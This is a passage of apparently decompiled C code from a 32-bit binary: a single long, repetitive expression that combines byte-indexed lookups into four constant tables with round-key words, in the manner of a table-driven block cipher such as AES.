0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x413dc8 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x18) * 4) ^  *(0x413dc8 + (_t158 & 0x000000ff) * 4) ^ _t242[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x413dc8 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x413dc8 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  